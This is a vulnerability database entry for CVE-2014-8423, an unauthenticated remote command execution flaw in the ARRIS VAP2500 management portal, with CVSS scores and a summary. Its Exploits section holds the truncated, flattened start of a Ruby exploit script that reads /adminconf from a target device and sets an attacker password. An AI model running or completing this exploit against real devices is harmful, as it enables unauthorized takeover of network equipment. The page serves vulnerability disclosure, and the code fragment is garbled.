10
CVSSv2

CVE-2014-8423

Published: 28/11/2014 Updated: 28/11/2014
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Unspecified vulnerability in the management portal in ARRIS VAP2500 before FW08.41 allows remote malicious users to execute arbitrary commands via unknown vectors.

Vulnerable Product Search on Vulmon Subscribe to Product

arris vap2500 firmware

Exploits

#!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV[0] puts "Usage: #{$0} <vap2500_ip_address>" exit(0) end host = ARGV[0] new_pass = "h4x0r3d!" http = Net::HTTPnew(host)start users = nil users = httprequest_get("/adminconf")bodysplit("\n")map! {|user| usersub(/^(*?),*$/,"\\1")} if users puts "[*] found u ...